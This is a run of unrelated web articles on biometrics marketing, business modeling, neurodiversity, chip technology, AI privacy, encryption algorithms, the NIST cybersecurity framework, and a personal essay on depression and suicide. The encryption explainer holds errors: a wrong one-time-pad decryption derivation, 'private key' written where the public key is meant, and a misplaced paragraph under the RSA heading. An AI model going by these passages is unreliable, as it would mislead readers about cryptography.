- Processing Units: While data processing is a prominent part of any authentication system, biometrics require special software to complement the hardware and the stored biometric data. The processing component will take the raw physical data provided through the sensor, extract the notable characteristics of that data and, depending on the type deployed, turn it into computer-readable data that can compare against data stored in a database.
- Storage: Biometric data is stored as a “biometric template.” Rather than store a raw picture of, say, a fingerprint (a clear privacy and compliance problem), the system will translate traits into machine data and use it as a template to compare against the physical input provided.
While these systems can be hacked, it is prohibitively difficult to use hacked biometrics in any meaningful way.
Are Modern Biometrics Reliable?
The short answer is yes.
Not all forms are created equal, and no security system is 100% effective. However, biometrics offer higher levels of security that are otherwise not available through several features and mechanisms:
- Immutable Identification: Most usable biometrics (e.g., fingerprints and iris scans) are unique to the user. As such, it’s difficult to fake access to a system and much easier to ensure that the user accessing an account or resource is who they say they are.
- Complex MFA: Biometrics, combined with SMS or email-based tokens or passwords, can serve as part of a robust MFA system that helps secure accounts and make them harder to hack through traditional means (e.g., password cracking, database hacks, phishing, etc.).
- Convenience: Biometrics are easy to implement. User experience is often a barrier to good security practices (see poor or shared passwords), and they can mitigate that problem.
- Passwordless Authentication: Biometrics can also serve as the foundation for a biometric password or, ultimately, a passwordless system where users do not have to create, remember, or manage a password to use a system—all without sacrificing security.
However, these truisms aren’t expected to hold forever, and even the strongest biometrics won’t eliminate the potential for credential spoofing. Even now, there have been instances of hackers spoofing fingerprints, voice analysis, and facial scans with hacked data. The future of this authentication will expand these services into advanced biometrics like identity proofing and liveness tests.
1Kosmos: Advanced Biometrics and Passwordless Security
Most compliance and security standards will require, at minimum, some form of MFA that includes biometric security. However, as attacks and vulnerabilities evolve, this too will require additional security factors to guarantee the user is who they say they are at the time of authentication. This involves a system that can prove and manage identity while streamlining biometrics in a compliant and user-friendly system.
This is 1Kosmos. The 1Kosmos BlockID system brings advanced biometrics, distributed identity management, and simple user onboarding to enterprise organizations worldwide. The BlockID solution supports advanced authentication and compliance with the following features:
- Identity Proofing: BlockID includes Identity Assurance Level 2 (NIST 800-63A IAL2), detects fraudulent or duplicate identities, and establishes or reestablishes credential verification.
- Identity-Based Authentication Orchestration: We push biometrics and authentication into a new “who you are” paradigm. BlockID uses biometrics to identify individuals, not devices, through identity credential triangulation and validation.
- Integration with Secure MFA: BlockID readily integrates with a standard-based API to operating systems, applications, and MFA infrastructure at AAL2. BlockID is also FIDO2 certified, protecting against attacks that attempt to circumvent multi-factor authentication.
- Cloud-Native Architecture: Flexible and scalable cloud architecture makes it simple to build applications using our standard API, including private blockchains.
- Privacy by Design: 1Kosmos protects personally identifiable information in a private blockchain and encrypts digital identities in secure enclaves only accessible through advanced biometric verification.
If you’re ready to learn more about biometrics and passwordless authentication, watch the webinar The Journey to Passwordless with 1Kosmos and Ed Amoroso of TAG Cyber. Also, make sure to sign up for the 1Kosmos newsletter to learn more about our products, services, and events. | <urn:uuid:67e58db8-4d25-4b27-ae79-33b32f20f401> | CC-MAIN-2024-38 | https://www.1kosmos.com/biometric-authentication/biometrics-security/ | 2024-09-17T09:27:06Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00187.warc.gz | en | 0.924795 | 1,824 | 2.625 | 3 |
In today's rapidly changing business landscape, organizations need to be able to adapt quickly and effectively to new challenges and opportunities. xMBL, or eXtended Business Modeling Language, is a powerful tool that can help businesses do just that.
xMBL is a visual modeling language that enables businesses to represent their processes, data, and organizational structure in a clear and concise way. This makes it easier for stakeholders to understand and collaborate on business transformation initiatives.
Here are some of the key benefits of using xMBL:
- Enhanced decision-making: xMBL provides a comprehensive and accurate representation of business processes, which can help businesses make data-driven decisions. By modeling various scenarios, businesses can assess potential risks, optimize processes, and identify growth opportunities.
- Agility and adaptability: xMBL is a flexible and adaptable language that can be used to model a wide range of business processes. This makes it ideal for businesses that need to be able to quickly adapt to change.
- Cross-functional collaboration: xMBL provides a common visual language that can be used by stakeholders from across the organization. This can help to break down silos and improve communication, leading to better decision-making and collaboration.
- Digital transformation enabler: xMBL can be used to model the impact of digital technologies on business processes. This can help businesses to identify areas where they can improve their operations and achieve their digital transformation goals.
There are a number of potential applications for xMBL, including:
- Business process optimization: xMBL can be used to identify and eliminate bottlenecks in business processes, leading to increased efficiency and productivity.
- Risk management: xMBL can be used to model potential risks and develop mitigation strategies. This can help businesses to reduce the impact of negative events.
- Supply chain management: xMBL can be used to model and optimize supply chain processes, leading to improved coordination and transparency between suppliers, manufacturers, and distributors.
- Strategic planning: xMBL can be used to create and analyze different business strategies, providing insights into which strategies are most likely to be successful.
While xMBL offers a number of benefits, there are also some challenges that organizations need to be aware of. These include:
- The need for change management: The adoption of xMBL requires a change in mindset and behavior from stakeholders across the organization. This can be a challenge to achieve, but it is essential for successful implementation.
- The need for training: xMBL is a complex language that requires training for users. This can be a significant investment of time and resources.
- The need for data integration: xMBL can be used to integrate data from a variety of sources. This can be a complex and time-consuming process, but it is essential for the accurate modeling of business processes.
Despite these challenges, xMBL is a powerful tool that can help businesses to achieve their digital transformation goals. As organizations continue to embrace the digital age, xMBL is likely to play an increasingly important role in business modeling.
Here are some additional thoughts on the future of xMBL:
- As xMBL matures, it is likely to become more user-friendly and easier to implement. This will make it more accessible to a wider range of organizations.
- xMBL is likely to be increasingly integrated with other technologies, such as artificial intelligence and machine learning. This will enable businesses to use xMBL to make more informed decisions and improve their operations.
- xMBL is likely to play a key role in the development of new business models and the adoption of new technologies. As the world becomes increasingly digital, businesses will need to be able to model and adapt their processes to stay ahead of the competition. xMBL is a powerful tool that can help businesses do just that. | <urn:uuid:d19c2b1f-1e88-43eb-8fb2-ce01e3797f82> | CC-MAIN-2024-38 | https://www.bptrends.com/xbml-extended-business-modeling-language/ | 2024-09-17T07:44:39Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00187.warc.gz | en | 0.940255 | 792 | 2.5625 | 3 |
People who are neurodivergent may process and solve problems in different ways. This can provide greater challenges when navigating a working world designed for neurotypical individuals. In the tech sector, half of those who identified as neurodivergent felt impacted by the conditions in the workplace, citing their work environment and company culture as exacerbating factors. When you consider that one in five people in the tech sector identify as definitely or likely neurodivergent, it highlights how many people may have felt a level of discomfort within their workplace. There has undoubtedly been a shift in the last few years with organizations having a greater awareness regarding the needs of neurodivergent individuals, but there is much to still do. Organizations understandably want to have productive and efficient teams. If workplace processes are attentive to individual needs, it fosters greater inclusivity and helps employees to feel valued and comfortable in their role. This then impacts positively on company culture and staff retention.
Recognizing Neurodiversity and Diverse Thinking
When it comes to the tech sector, neurodiverse thinking can add valuable insights and different perspectives. Some individuals may pay strong attention to detail and hyperfocus in, whilst others provide ‘bigger picture’ thinking when problem solving. Studies show people with dyslexia, for example, have strong analytical thinking skills and an eye for spotting trends, while autistic people may have higher levels of concentration and strong mathematical abilities. Each person brings their unique combination of strengths. These types of skills can be incredibly valuable to tech teams; for example, cybersecurity, where it’s crucial to understand certain patterns and alerts and their meanings.
The diversity of this talent can lead to improved problem solving, creative thinking, and provide a more competitive edge for company success.
Assessments and Coaching Services
It’s important that organizations assess their work environment, starting with their recruitment processes and leading through each part of the employee journey. Employers should also be training managers to ensure every employee receives equal opportunities to be supported and thrive at work. Organizations should also embed employee assistance programs (EAP) into their businesses, particularly ones that understand neuro-inclusivity and can support a neurodiverse workforce. They should provide a focus on coaching and assessing how to best assist individuals.
This can also include launching a neurodiversity policy, to support those with a diagnosis or considering assessment. With this, organizations can be guided on mentoring or counselling to help them adapt well to new conditions or tasks and establish where they may need extra support. Managers should also be receiving awareness training on how they can best assist their team members going forward and to avoid bias in the workplace. For some employees, it may be beneficial to conduct a needs assessment with a neurodiversity expert via the organization's health provider to get a full picture of the employee's needs.
Regarding the bigger picture, organizations could also ensure that their health benefits are inclusive of neurodiverse employees and offer services to suit their requirements. This should involve access to therapy outside of the workplace and access to health services that can be specific to neurodivergent challenges.
Helping Neurodiverse Employees Navigate
One of the keys to getting the most out of any team member is understanding their needs. To enable this, it’s important that the organization fosters inclusive spaces in which neurodivergent individuals feel safe to disclose their diagnoses and don’t fear bias or discrimination at work.
Paying attention to working environments and sensory needs is crucial. Workplace adjustments do not need to be costly. For instance, lowering light intensity or moving people away from noisy areas to aid concentration. If this isn’t feasible, employers could provide noise cancelling earphones or screen filters. In fact, setting aside specific areas where all workers can decompress could be helpful to all employees.
Businesses that are able to, could also think about flexibility, and be aware that there isn’t a one-size-fits-all working model. To best accommodate their employees, employers should have open conversations to understand different needs and preferred working environments. This will help them to develop a greater empathetic leadership style, which in turn will help their employees feel more comfortable at addressing any preferences they may have.
The option to be able to work from home, as an example, may be better and more productive for some neurodivergent individuals. It’s important to remember that no individual will be the same, which is why having conversations and being open to receiving feedback is crucial to creating an inclusive culture. Coaching and co-coaching may also be helpful in this area.
While the benefits of a neuro-inclusive workplace are becoming more apparent, for this to continue, it is important that organizations take further steps to make all their staff feel safe and supported to discuss their needs. This leads to feeling valued and thriving, and ultimately a better workplace and agile business.
Read more about:
Diversity, Equity, and Inclusion (DEI)About the Author
You May Also Like
Maximizing cloud potential: Building and operating an effective Cloud Center of Excellence (CCoE)
September 10, 2024Radical Automation of ITSM
September 19, 2024Unleash the power of the browser to secure any device in minutes
September 24, 2024 | <urn:uuid:d984a3fe-5a9d-40e6-a1a6-9a7d459e6295> | CC-MAIN-2024-38 | https://www.informationweek.com/it-leadership/and-teams-guiding-them-on-effective-patient-support-and-collaborative-teamwork-she-also-works-with-business-organizations-to-support-neuro-inclusivity-through-training-coaching-policy-review-and-supporting-managers-becoming-neuroinclusive-how-tech-organizations-can-succeed | 2024-09-10T00:17:54Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651164.37/warc/CC-MAIN-20240909233606-20240910023606-00887.warc.gz | en | 0.960449 | 1,089 | 2.75 | 3 |
With Intel (INTC) just entering its 14nm chips on the market, IBM (IBM) has bolted way ahead by producing a functioning version of the semiconductor industry’s first 7-nanometer computer chip sporting about four times the power of current processors.
Don’t hold your breath to see a 7nm chip on the market anytime soon. Still, the relatively rapid pace at which the 7nm technology was developed is huge.
A partnership that included IBM, Globalfoundaries and Samsung collaborated at the State University of New York Polytechnic Institute’s Colleges of Nanoscale Science and Engineering (SUNY Poly CNSE), to produce a working version of the chip, which could result in the ability to place more than 20 billion transistors on a fingernail-sized piece of silicon to power everything from smartphones to spacecraft.
The collaboration is tied to IBM’s pledge a year ago to commit some $3 billion to chip research and development over the next five years.
“For business and society to get the most out of tomorrow’s computers and devices, scaling to 7nm and beyond is essential,” said Arvind Krishna, IBM Research senior vice president and director.
“That’s why IBM has remained committed to an aggressive basic research agenda that continually pushes the limits of semiconductor technology,” he said. “Working with our partners, this milestone builds on decades of research that has set the pace for the microelectronics industry, and positions us to advance our leadership for years to come.”
Servers powering data centers typically deploy 22nm and 14nm processors but the IBM, Globalfoundaries and Samsung consortium said 7nm technology could deliver at least a 50 percent power/performance improvement for next generation mainframe and high-end systems to power the Big Data, cloud and mobile era. It took Intel years to move from 22nm to the more efficient and faster 14nm chips.
The 7nm technology is considered vital to meet computing’s future processing demands, including the cloud, big data, mobile, cognitive computing and other emerging technologies.
IBM said to achieve the higher performance, lower power and scaling benefits of 7nm technology its researchers adopted new processes and techniques, including some industry-first innovations such as Silicon Germanium (SiGe) channel transistors and Extreme Ultraviolet (EUV) lithography integration at multiple levels.
About the Author
You May Also Like | <urn:uuid:e13c73ee-3b66-4c00-84a3-929da8a05605> | CC-MAIN-2024-38 | https://www.channelfutures.com/channel-sales-marketing/ibm-reveals-functioning-version-of-semiconductor-industry-s-first-7nm-chip | 2024-09-11T06:48:36Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00787.warc.gz | en | 0.932279 | 509 | 2.578125 | 3 |
By Heather Dunn Navarro, Vice President, Product and Privacy, Legal, G & A, Amplitude
The ongoing AI revolution has brought about a data explosion: 70% of businesses report at least a 25% annual increase in data generation. This means that AI-powered data processing and analysis capabilities have never been more crucial. However, generating and analysing such extensive amounts of data raises significant user consent and privacy issues, particularly when privacy laws are evolving so rapidly.
Against this backdrop, understanding the impact of AI on data privacy is a non-negotiable. By staying ahead of changing consumer attitudes and legal landscapes, organisations can harness technological advancements while safeguarding customer data and remaining compliant.
AI’s role in businesses
AI-powered technologies offer numerous benefits, like being able to process vast amounts of data at speeds far beyond human capabilities. They can automatically organise data using predefined criteria or learned patterns, accelerating data management and reducing human error. AI can also carry out sophisticated analysis, identify patterns, and forecast future trends. All of this can help organisations become more strategic in their decision making.
Additionally, companies can use AI tools to help them keep up with new regulations. For instance, companies can deploy AI to check evolving regulations and automatically share updates with stakeholders. Going further, organisations can even use AI to monitor data usage and detect anomalies that indicate a potential risk.
Navigating the landscape of privacy laws
However, there are two sides to every coin. While AI can further compliance efforts, it can also create new privacy and security challenges. This is particularly true today, amid an ongoing global effort to strengthen data privacy laws. 71% of countries have data privacy legislation, and in recent years, this has evolved to encapsulate AI. In the EU, for instance, approval has been secured from the European Parliament around a specific AI regulatory framework. This framework imposes specific obligations on providers of high-risk AI systems and could ban certain AI-powered applications.
The fact is, AI-powered technology is immensely powerful. But, it comes with complex challenges to data privacy compliance. A primary concern here relates to purpose limitation, specifically the disclosure provided to consumers regarding the purpose(s) for data processing and the consent obtained. As AI systems evolve, they may find new ways to utilise data, potentially extending beyond the scope of original disclosure and consent agreement. As such, maintaining transparency in AI operations to ensure accurate and appropriate data use disclosures is critical.
Another critical area of concern is the potential of AI bias, which could result in AI systems making unfair decisions about a particular group of people. This could have huge consequences if unaddressed, such as leaving some unable to get mortgage offers, or unable to get into their university of choice.
To prevent any of these risky scenarios from occurring, companies must pay attention and respond to new AI regulations as they emerge.
The consumer comes first
Today, consumers are far more savvy when it comes to privacy, and are more concerned about how their data is used. Frequent mainstream news coverage of high-profile data privacy cases has heightened this. There is also the challenge of addressing public concerns, with nearly two-thirds of consumers worrying about AI systems lacking human oversight. Moreover, 93% believe irresponsible AI practices damage company reputations. Organisations must confront the critical challenge of how to innovate with AI while maintaining compliance and public trust.
However, the landscape is nuanced. Many consumers are willing to exchange data for enhanced personalisation and improved experiences. Successful businesses are finding a way to balance AI innovation, customer experiences, and protecting customers’ privacy rights.
To find that balance, organisations must focus on three key areas: transparency, informed consent, and customer control. Being transparent requires communicating data practices clearly and accessibly, rather than being hidden away or presented in highly complicated language. When it comes to informed consent, it should be viewed as an ongoing process rather than a one-time checkbox, and consent should maintain pace with AI as it evolves. Finally, empowering customers with granular control over their data – including options to opt in or out, access, correct, and delete their information – is crucial. This is especially pertinent given the potential for inaccurate data to lead to erroneous AI outcomes. By addressing all of these aspects, organisations can build trust while harnessing the power of AI for business growth.
Protecting customer data privacy is complex, but essential, and should never be viewed as a deterrent from pursuing AI initiatives. By striking the right balance between innovation and compliance, organisations can harness the power of AI to drive growth and improve customer experiences, all while maintaining the trust and confidence of their stakeholders.
Heather has been practicing law for nearly 20 years. She is currently VP, Product & Privacy, Legal at Amplitude, working with teams across the company to make sure they remain compliant and continue to enable their customers’ compliance. Over the course of her legal career, she has worn many hats, always focused on helping companies manage risk. | <urn:uuid:417e8bf5-62c2-41ee-96e6-72ed89d88a03> | CC-MAIN-2024-38 | https://www.architectureandgovernance.com/applications-technology/the-ai-balancing-act-innovating-while-safeguarding-consumer-privacy/ | 2024-09-14T23:39:44Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00487.warc.gz | en | 0.945335 | 1,016 | 2.515625 | 3 |
Symmetric encryption algorithms use the same secret key for both encryption and decryption. This means that the sender and the recipient of an encrypted message need to share a copy of the secret key via a secure channel before starting to send encrypted data. Symmetric encryption algorithms come in two different varieties: block and stream ciphers.
Types of Encryption Algorithms + Pros and Cons for Each
Types of Encryption Algorithms + Pros and Cons for Each
A block cipher encrypts data in fixed-size chunks. For example, the Advanced Encryption Standard (AES) uses a block length of 128 bits.
If the plaintext is shorter than the block length, then it is padded out to the desired length before encryption. At the other end, the recipient of the message will decrypt it and then remove the padding to restore the original message.
If a plaintext is longer than the block length, then it is broken up into multiple different chunks for encryption. A block cipher mode of operation defines how these chunks are related to one another.
Each mode of operation has its pros and cons. For example, Electronic Code Book (ECB) mode is the simplest mode of operation. With ECB, each block is encrypted completely independently.
The downside of this is that blocks with the same plaintext produce the same ciphertext. The image above is a picture of the Linux penguin. While this data is encrypted, the ciphertexts for a pixel of a certain color (black, white, etc.) are the same throughout the image, so the penguin is still visible.
Other modes of operation eliminate this issue by interrelating the encryption of each block. Some also provide additional features, such as Galois Counter Mode (GCM), which generates a message authentication code (MAC) that verifies that data has not been modified in transit.
Example: The Advanced Encryption Standard (AES)
The most famous block cipher is the Advanced Encryption Standard (AES). This encryption algorithm was selected as the result of a contest run by the National Institute of Standards and Technology (NIST) to replace the aging Data Encryption Standard (DES).
AES is a family of three different algorithms designed to use a 128, 192, or 256 bit encryption key. These algorithms are broken into a key schedule and an encryption algorithm.
The encryption algorithm of AES is largely the same for all three versions. It is divided into rounds, which are composed of a set of mathematical operations. The main difference between the different AES versions is the number of rounds used: 10, 12, and 14.
Each round of AES uses a unique round key that is derived from the original secret key. Deriving these round keys is the job of the key schedule Each AES version’s key schedule is different because they take different length secret keys and produce different numbers of 128-bit round keys.
The other type of symmetric encryption algorithm is a stream cipher. Unlike a block cipher, a stream cipher encrypts a plaintext one bit at a time.
A stream cipher is designed based on the only completely unbreakable encryption algorithm: the one-time pad (OTP). The OTP takes a random secret key the same length as the plaintext and exclusive-ors (XORs) each bit of the plaintext and key together to produce the ciphertext as shown in the image above.
Decryption with a OTP is the same as encryption. This is because anything XORed with itself is zero and anything XORed with zero is itself. With a plaintext P, ciphertext C, and key K
C XOR K = (C XOR K) XOR K = C XOR (K XOR K) = C XOR 0 = C
While it has great security, the OTP is rarely used because it is impractical to securely share the massive amounts of key material that it needs to work. A stream cipher uses the same idea as the OTP with a slightly less secure key.
Instead of a fully random key, a stream cipher uses a secret key to feed a pseudo-random number generator. By sharing the same secret key and algorithm, the sender and recipient of a message can crank out the same string of bits, enabling them to encrypt and decrypt a message.
Example: Rivest Cipher 4 (RC4)
RC4 is an example of a widely-used stream cipher. It was created by Ron Rivest in 1987 and was originally a trade secret of RSA Security. In 1994, the details of the cipher were leaked, making it publicly usable.
RC4 is used in a variety of different applications, including the WEP and WPA encryption standards for Wi-Fi. The cipher has some known vulnerabilities, especially for certain applications, but can still be used if some of the initial bytes of the generated keystream are discarded.
Unlike symmetric encryption, asymmetric cryptography uses two different keys for encryption and decryption. The public key is used to encrypt a message, while the private key is used for decryption.
The private key is a completely random number. The public key is derived from the private key using a mathematically “hard” problem.
This “hard” problem is based on a mathematical operation that is “easy” to perform but “hard” to reverse. A number of different “hard” problems are used, including integer-based ones and ones based upon elliptic curves.
Integer-based asymmetric cryptography uses two main “hard” problems. These are the factoring and discrete logarithm problems.
The factoring problem is based on the fact that it is relatively easy to multiply two numbers together but it is hard to factor them. In fact, factoring is so hard that the best way to do so (on a “classical” computer) is through a brute force search. Someone wanting to factor the product of two prime numbers needs to test potential factors until they happen to find one of the two factors, which can take a very long time.
An asymmetric encryption algorithm based on the factoring problem will have a public key calculated using the product of two private keys (large prime numbers). This calculation is easy to perform, but anyone wanting to derive the private key from the public key will need to factor it, which is much harder.
The difficulty of multiplication grows polynomially with the length of the factors, but the difficulty of factoring grows exponentially. This makes it possible to find a “sweet spot”, where a system is usable but essentially unbreakable.
The discrete logarithm problem uses exponentiation and logarithms as its “easy” and “hard” operations. Similar to factoring, the complexity of calculating logarithms grows much more quickly as the size of the exponent increases.
Example: Rivest-Shamir-Adleman (RSA)
Symmetric encryption is a simple cryptographic algorithm by today’s standards, however, it was once considered state of the art. In fact, the German army used it to send private communications during World War II. The movie The Imitation Game actually does quite a good job of explaining how symmetric encryption works and the role it played during the war.
With symmetric encryption, a message that gets typed in plain text goes through mathematical permutations to become encrypted. The encrypted message is difficult to break because the same plain text letter does not always come out the same in the encrypted message. For example, the message “HHH” would not encrypt to three of the same characters.
To both encrypt and decrypt the message, you need the same key, hence the name symmetric encryption. While decrypting messages is exceedingly difficult without the key, the fact that the same key must be used to encrypt and decrypt the message carries significant risk. That’s because if the distribution channel used to share the key gets compromised, the whole system for secure messages is broken.
One of the most famous asymmetric encryption algorithms in existence is the one developed by Ron Rivest, Adi Shamir, and Leonard Adleman called RSA. This algorithm is based on the factoring problem.
The image above shows a simple example of how RSA works. The plaintext (2) is raised to the power of the public key (5): 2^5 = 32. This value is then divided by a public modulus (14) and the remainder (4) is sent as the ciphertext: 32 % 14 = 4.
At the other end, the same operation is performed with the private key instead of the public key to produce the plaintext: (4^11) % 14 = 2. This calculation works because the public and private keys are selected so that they are inverses in the chosen modulus.
Integer-based asymmetric cryptography uses factoring and discrete logarithm problems to build secure encryption algorithms. Elliptic curve cryptography uses the same problems with a little twist.
Instead of using integers for its calculations, elliptic curve cryptography uses points on an elliptic curve, like the one shown above. A private key is still a random number, but a public key is a point on the curve.
A few different mathematical operations are defined on these curves. The two important ones here are:
- Point Addition (equivalent to integer multiplication)
- Point Multiplication (equivalent to integer exponentiation)
On these curves, it is possible to perform calculations that are equivalent to the “easy” operations of the factoring and discrete logarithm problems. This means that the same basic algorithms can be adopted to use with elliptic curves.
But why bother? Elliptic curve cryptography is useful because smaller key lengths provide the same level of security. This means that elliptic curve cryptography uses less storage, processing power, and energy to protect data at the same level as an equivalent integer-based algorithm. These savings can be important for resource-constrained systems like Internet of Things (IoT) devices or smartphones.
Pros and Cons of Symmetric and Asymmetric Encryption
Symmetric and asymmetric encryption algorithms both are designed to do the same job: protecting the confidentiality of data. However, they do their jobs in very different ways, and each approach has its pros and cons:
- Symmetric Encryption: The main advantage of symmetric cryptography is its efficiency. In general, symmetric encryption algorithms use less memory and processing power than asymmetric cryptography.
- Asymmetric Encryption: Asymmetric encryption does not require the two parties to securely share a secret key before sending encrypted messages. This makes it possible to securely communicate with anyone as long as you have their private key.
These different strengths mean that symmetric and asymmetric cryptography are often used together, like in the TLS protocol. Asymmetric encryption is used to securely exchange a symmetric key, and symmetric encryption is used for bulk data transfer.
Quantum Computing and Its Impacts on Cryptography
When discussing the pros and cons of different encryption algorithms, it is important to take into account the growth of quantum computing. Quantum computers have the ability to break some of the asymmetric encryption algorithms in common use today.
The reason for this is that some of the “hard” problems used in asymmetric cryptography are not “hard” for quantum computers. While factoring is exponentially difficult for a classical computer, it only has polynomial difficulty for a quantum computer due to the existence of Shor’s algorithm.
If multiplication and factoring both have polynomial complexity, then it is impossible to build a cryptosystem using this problem that is both usable and secure. The same is true for the discrete logarithm problem. It is also broken once large enough quantum computers become available.
However, this does not mean that quantum computing will be the end of asymmetric cryptography. New problems have been discovered that are believed to be “hard” for quantum computers as well. This has led to the development of new post-quantum asymmetric encryption algorithms based upon these new “hard” problems. | <urn:uuid:e097895e-0120-45d7-a9e4-738383cfe22c> | CC-MAIN-2024-38 | https://www.keyfactor.com/education-center/types-of-encryption-algorithms/ | 2024-09-15T00:25:22Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651601.85/warc/CC-MAIN-20240914225323-20240915015323-00487.warc.gz | en | 0.932355 | 2,523 | 4.09375 | 4 |
The NIST cybersecurity framework is a set of guidelines and best practices developed by the National Institute of Standards and Technology (NIST) in response to an Executive Order from the U.S. government. The intention of the framework is to help organizations in critical infrastructure sectors manage and reduce cybersecurity risk.
This framework categorizes five core functions — identify, protect, detect, respond, and recover — as a flexible starting point for organizations to improve their cybersecurity awareness and preparedness. It also includes categories and subcategories which provide a more concrete action plan for specific departments or processes within an organization.
NIST guidelines are mandatory for U.S. government agencies and any organization doing business with the U.S. government. However, the framework should be adopted by all organizations — both public and private — concerned about their cybersecurity posture.
As the NIST CSF's first function, Identify encompasses a series of controls focused on developing an organizational understanding to manage cybersecurity risk to systems, people, assets, data, and capabilities.
Claroty Support: Claroty’s automated asset discovery capabilities and centralized asset inventory allow organizations to gain complete, real-time visibility into all IoT, IIoT, IoMT, and other connected devices — providing them with the XIoT asset inventory that is foundational to complying with the NIST cybersecurity framework.
As the NIST CSF's second function, Protect encompasses a series of controls focused on outlining the appropriate safeguards to ensure delivery of critical infrastructure services.
Claroty Support: Claroty equips organizations to harden their environments against cyber threats by harnessing expert-defined policies and granular access controls to embrace network segmentation and Zero Trust. We also offer newly enhanced Exposure Management capabilities, which allows organizations to better understand their CPS risk posture, better allocate their resources to improve it, and to protect their critical CPS environments from growing threats.
As the NIST CSF's third function, Detect encompasses a series of controls focused on enabling the timely discovery of cybersecurity events.
Claroty Support: Claroty enables organizations to continuously monitor for and respond to the earliest indicators of threats — ranging from ransomware, to equipment failures, to malicious insiders, to IP theft, to misconfigurations —before they impact safety, compliance, or other assets.
As the NIST CSF's fourth function, Respond encompasses a series of controls focused on taking action against a detected cybersecurity incident.
Claroty Support: Claroty offers multiple detection engines to automatically profile all assets, communications, and processes in CPS networks. Our solutions have a deep understanding of proprietary industrial protocols and device behaviors to ensure each device receives the security policy appropriate for it — and prevents any future violations. We also provide a portfolio of threat capabilities that seamlessly integrate with your existing tech stack — bridging the IT-Industrial expertise gap.
As the NIST CSF's fifth function, Recover encompasses a series of controls focused on appropriate activities to maintain plans for resilience and to restore any capabilities or services that were impaired due to a cybersecurity incident.
Claroty Support: Claroty solutions provide change information on critical systems to assess whether affected systems can be put back into production, and KPIs for improvement through our analysis of network segmentation, critical system vulnerabilities, and attack vectors. We also enable information sharing for secure and efficient distribution of information critical to recover.
As the NIST CSF’s sixth function, Govern encompasses a series of controls focused on helping organizations establish and monitor their cybersecurity risk management, strategy, expectations, and policy.
Claroty Support: Claroty solutions provide risk scoring and vulnerability assessment reporting that give organizations the support they need to align with their expectations and goals. By assisting in the creation of cybersecurity policies across the organization and CPS devices, Claroty solutions ensure the ability to assess overall security postures, measurements of risks and threats in each unique environment, and enables the prioritization of risk tolerance for operational risk decisions.
Claroty xDome is a flexible SaaS platform purpose-built for all use cases & types of CPS on the entire industrial cybersecurity journey.
Medigate by Claroty is a SaaS-based healthcare cybersecurity platform that safeguards the connected devices that underpin patient care.
Claroty xDome Secure Access delivers frictionless, reliable, secure access for internal and third-party OT personnel. | <urn:uuid:f20c36b3-683f-447d-b5cd-5b15bc9a521c> | CC-MAIN-2024-38 | https://claroty.com/complying-with-the-nist-cybersecurity-framework | 2024-09-16T06:43:23Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651676.3/warc/CC-MAIN-20240916044225-20240916074225-00387.warc.gz | en | 0.923702 | 894 | 2.734375 | 3 |
These statistics make an uncomfortable read; they are distressing and show how we, as a global society, have failed to prevent not only unnecessary deaths but also the pain and the suffering of hundreds of thousands of families, friends, and relatives around the world. Suicide doesn’t only affect the individual affected, but also those around them. Suicide can be seen by many as a selfish act, as an act of weakness. But is it really? Can we really imagine what is going through that person’s mind and how desperate they must have felt that the only way out for them was to take their own life?
As a depression sufferer myself, I know how scary it is to be tormented by your own mind; to know that whatever you do, regardless of where you go or how hard you try, you cannot escape it, and you will never be able to. If you are bullied or tormented by a person, you can always change your environment, whether it is a school, university, workplace, etc. … But you cannot change your brain!
Our societies today encourage us to be ourselves, to show who we are, to accept each other. We aim to build a culture that celebrates differences, that is more human and understanding. And yet, when you are different, you can still feel that your culture and your community don’t accept you. It’s lonely to feel outcast by your peers or to think that wherever you go, you just don’t fit anywhere. These feelings can be caused by many things – sexuality, race, culture, weight, personality, disability, mental and physical health, social status, religion.
The stigma and the shame around mental health are still so strong that many people don’t feel comfortable talking about their struggles. Should this make us ask ourselves the questions ‘Do we really accept others’ differences?’; ‘Do we approach people with an open mind?’; ‘Have we done enough or even anything at all to show people that it’s OK to be different?’; ‘Why do we need to put people in a box – after all, we come in all shapes and sizes?’
Many people with mental health issues feel that they aren’t understood; that others don’t know what it feels and looks like to feel tortured by your own mind. Well, let me tell you what this looks like! When you suffer from poor mental health, your mind can easily go into overdrive, and regardless of how much you try to stop it, you just aren’t able to. You think about everything, you are sensitive, both mentally and physically, to every single detail no matter how small it is, and you look at it at every angle, you think the worst about everything. You try and tell yourself that this is only in your head, and yet, it feels so, so real that you can’t stop thinking about it. You have to sit in your doctor’s office and hear the warning that the medication they give you will make you worse before it makes you better; that it can trigger suicidal thoughts and can cause some people to die by suicide because of the chemical reactions that happen in your brain.
At times like this, you need your friends and your family around more than ever, but the guilt for making them worry about you and that you aren’t able to just ‘pull yourself together’ and ‘get on with life’ is stronger. And this is the worst feeling in the world! You feel the weight of the world on your shoulders, you are exhausted but can’t sleep because your mind is in overdrive, and you have thousands of thoughts rushing in and out of your head like cars in a busy motorway; you cry about every single thing; you don’t want to go anywhere, see anyone or do anything.
Imagine if you have gone for a run, but you are entirely out of control of your own body. You are out of breath, exhausted, you feel that you aren’t able to continue anymore, and yet, you keep running. Or if loud music plays around you and it is so loud and disturbing, but you can’t turn it off, it doesn’t matter how much you try.
In the four years I’ve suffered from depression, I’ve never been suicidal, even in my darkest days, but I have no doubt in my mind that if I had left things as they were and didn’t ask for help, I was heading down this path. In these dark days, when I sat on my own struggling to come to terms with the diagnosis, I made a promise myself that I will never, ever allow myself to get to a state where I can see no other way but to take my own life.
Suicide is not only a problem for the individual. It’s our problem too, because we are the ones who have the power to build and change a society; we have the ability to change lives and make them better or worse; we have the power to say NO to toxic cultures and outdated and discriminatory believes. So next time when your train is cancelled because of ‘a tragic accident on the tracks’, spare a thought for the person who was failed by all of us as a society, and who saw no other way out but to end their life, and ask yourself the question ‘What can I do to make this world more accepting and more tolerant of who people are?’
